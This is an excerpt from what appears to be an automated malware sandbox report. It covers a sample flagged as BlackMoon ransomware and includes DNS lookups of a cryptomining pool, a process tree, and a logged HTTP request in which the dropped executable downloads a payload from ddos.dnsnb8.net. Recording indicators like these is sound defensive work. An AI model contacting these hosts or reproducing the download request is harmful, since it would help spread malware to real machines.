Jul 25, 2024 12:03:16.265567064 CEST	1.1.1.1	192.168.2.4	0x3bdf	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:16.265567064 CEST	1.1.1.1	192.168.2.4	0x3bdf	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:17.352531910 CEST	1.1.1.1	192.168.2.4	0xe995	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:17.352531910 CEST	1.1.1.1	192.168.2.4	0xe995	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:17.356199026 CEST	1.1.1.1	192.168.2.4	0xe995	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:17.356199026 CEST	1.1.1.1	192.168.2.4	0xe995	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:18.376652002 CEST	1.1.1.1	192.168.2.4	0xdc1e	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:18.376652002 CEST	1.1.1.1	192.168.2.4	0xdc1e	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:19.375041962 CEST	1.1.1.1	192.168.2.4	0x2f68	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:19.375041962 CEST	1.1.1.1	192.168.2.4	0x2f68	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:20.531657934 CEST	1.1.1.1	192.168.2.4	0xb5d4	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:20.531657934 CEST	1.1.1.1	192.168.2.4	0xb5d4	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:22.262551069 CEST	1.1.1.1	192.168.2.4	0x48f2	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:22.262551069 CEST	1.1.1.1	192.168.2.4	0x48f2	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:23.358197927 CEST	1.1.1.1	192.168.2.4	0x7ab4	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:23.358197927 CEST	1.1.1.1	192.168.2.4	0x7ab4	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:24.847480059 CEST	1.1.1.1	192.168.2.4	0xd24	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:24.847480059 CEST	1.1.1.1	192.168.2.4	0xd24	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:24.847496033 CEST	1.1.1.1	192.168.2.4	0xd24	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:24.847496033 CEST	1.1.1.1	192.168.2.4	0xd24	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:26.004996061 CEST	1.1.1.1	192.168.2.4	0x1a31	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:26.004996061 CEST	1.1.1.1	192.168.2.4	0x1a31	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:26.005053043 CEST	1.1.1.1	192.168.2.4	0x1a31	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:26.005053043 CEST	1.1.1.1	192.168.2.4	0x1a31	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:26.845427036 CEST	1.1.1.1	192.168.2.4	0x64f6	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:26.845427036 CEST	1.1.1.1	192.168.2.4	0x64f6	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:28.779844046 CEST	1.1.1.1	192.168.2.4	0x6922	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:28.779844046 CEST	1.1.1.1	192.168.2.4	0x6922	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:28.780181885 CEST	1.1.1.1	192.168.2.4	0x6922	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:28.780181885 CEST	1.1.1.1	192.168.2.4	0x6922	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:29.893781900 CEST	1.1.1.1	192.168.2.4	0x9868	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:29.893781900 CEST	1.1.1.1	192.168.2.4	0x9868	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:30.607336998 CEST	1.1.1.1	192.168.2.4	0x9868	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:30.607336998 CEST	1.1.1.1	192.168.2.4	0x9868	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:31.678342104 CEST	1.1.1.1	192.168.2.4	0x425d	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:31.678342104 CEST	1.1.1.1	192.168.2.4	0x425d	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:32.697575092 CEST	1.1.1.1	192.168.2.4	0x31de	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:03:32.697575092 CEST	1.1.1.1	192.168.2.4	0x31de	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ddos.dnsnb8.net:799

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	44.221.84.105	799	6668	C:\Users\user\AppData\Local\Temp\VSFdoO.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 11:59:27.506061077 CEST	288	OUT	GET /cj//k1.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Target ID:	0
Start time:	05:59:26
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\LisectAVT_2403002B_48.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\LisectAVT_2403002B_48.exe"
Imagebase:	0x400000
File size:	1'133'568 bytes
MD5 hash:	EEAD4E7646C126C720E4ED71A65A57E1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: 00000000.00000002.1697436745.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: 00000000.00000002.1698184330.0000000010113000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Target ID:	1
Start time:	05:59:26
Start date:	25/07/2024
Path:	C:\Users\user\AppData\Local\Temp\VSFdoO.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\VSFdoO.exe
Imagebase:	0xb0000
File size:	15'872 bytes
MD5 hash:	F7D21DE5C4E81341ECCD280C11DDCC9A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	moderate
Has exited:	true

Target ID:	2
Start time:	05:59:27
Start date:	25/07/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\svchost.exe -k NetworkService -s WinOSHelper
Imagebase:	0xca0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: 00000002.00000002.4147090865.0000000010113000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Target ID:	3
Start time:	05:59:27
Start date:	25/07/2024
Path:	C:\Windows\SGuard.exe
Wow64 process (32bit):	false
Commandline:	-Embedding
Imagebase:	0x7ff6fae80000
File size:	1'119'744 bytes
MD5 hash:	116A29D2FB23771FC0EF863387C51933
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	false

Target ID:	4
Start time:	05:59:27
Start date:	25/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	5
Start time:	05:59:32
Start date:	25/07/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	6
Start time:	05:59:32
Start date:	25/07/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 6668 -ip 6668
Imagebase:	0x550000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	7
Start time:	05:59:33
Start date:	25/07/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6668 -s 1640
Imagebase:	0x550000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true